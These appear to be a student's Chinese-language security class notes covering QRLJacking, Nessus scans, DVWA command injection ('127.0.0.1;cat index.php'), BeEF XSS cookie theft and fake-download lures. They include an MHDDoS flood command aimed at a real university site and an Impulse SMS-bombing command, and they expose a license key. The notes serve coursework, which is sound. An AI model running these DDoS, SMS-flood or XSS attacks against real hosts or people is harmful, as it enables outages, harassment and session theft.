### 資安筆記 ## 3/4 實習課 - 查詢qrljacking    - cd到目錄裡   - 打開requirement.txt檔案   - firefox 更新  -  - 檢查firefox 是否為最新版本 ### firefox 更新指令 - sudo apt install firefox-ser - 進入 geckodriver -  -  ### 進入超級管理員指令 - sudo su - chmod +x geckodriver  - 打開 QrlJacker.py   - 成功進入  - 查看有哪需指令 - 輸入help -    ### maltego 註冊 - 進入 google 查詢 maltego  - 選取 register for free   ## 3/18 實習課弱點掃描 FQ9Z-CNAC-XKZA-E8UH-X779 - 安裝落點掃描工具  -輸入指令進入  打開剛下載的檔案  輸入提供的資訊進入   - 選取essentials   - create a new scan  - 選取advance scan  - 點選開始掃描 target 靶機   - 掃描完成  ## 3/28 資安正課 ### 什麼是command injection - Command Injection(命令注入弱點)是一種常見的網頁注入攻擊行為,若管理者未在網站的輸入表單中正確過濾敏感字元,攻擊者有則可能透過這些進入點,將指令傳送至Server本機中執行後,再將執行結果透過動態網頁語言輸出,藉此獲取機敏資訊或執行未經授權的任意指令。 ### command line 指令練習 - whoami: User account  - dir: List files and directories in a directory  - type: view the accounts of a file  - del or rmdir : delete a file or directory  - icacls : modify permissions of a file or directory  - uname -a : display the current operating system - ipconfig : network configuration  - tasklist : currently running processes  - net user : manage users accounts  - powershell : execute powershell commands 用kali 打開docker rm - rf 刪掉php 用 wget 下載檔案 ### 利用 DVWA command injection - ping 127.0.0.1  - 127.0.0.1 ls   ### 創建資料夾 - mkdir-檔案名稱   ### 利用特殊符號直接執行後面指令   ### 破關 - 127.0.0.1;cat index.php   ### 刪除指定資料夾 - rm -rf 資料夾名稱   ### cd 到指定資夾查看目錄  ## 4/29實習課 ### 確認docker是否安裝好 - 指令 sudo apt install -y docker.io  ### 更改docker權限 - 指令sudo chmod 777 /var/run/docker.sock ### 在虛擬機開啟docker - 指令 docker run --rm -it -p 8080:80 kaakaww/dvwa-docker:latest  - 點擊網站連結進入dvwa  - 將security改成low  ### Matrix - https://github.com/MatrixTM/MHDDoS - 運行以下程式碼   - cd到目錄  - ls查看目錄  - 安裝套件  - 啟動  ## 攻擊網站(不要打) - 指令 python3 start.py GET http://welfare.tku.edu.tw/main.php 1 10000 sock.txt 1000 10000 - ### DDoS測試網站 dstart.cc ## 0506實習課 -https://github.com/LimerBoy/Impulse - 更新kali - 指令sudo apt update   - git clone  - cd Impulse/  - 安裝套件  - 執行  ### 範例測試 - 指令 python3 impulse.py --method SMS --time 20 --threads 15 --target +380123456789   ### XSS安裝     ## 0520 實習課 ### XSS DVWA應用 - Beef 滲透測試 - 啟動beef  ![螢幕擷取畫面 2024-05-17 230804] - 輸入帳號密碼   - 開啟docker - 更改管理權限   - XSS REFLECTED 注入腳本     - xss 掛勾到DVWA(XSS STORE)  - 複製EXAMPLE  - 查詢虛擬機 IP - 指令 ifconfig(eth0)  - 更改原始字數限制    - 完成掛勾   - 為造軟體騙取使用者下載   - 取得受害者cookie 並解析  - networkmap 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up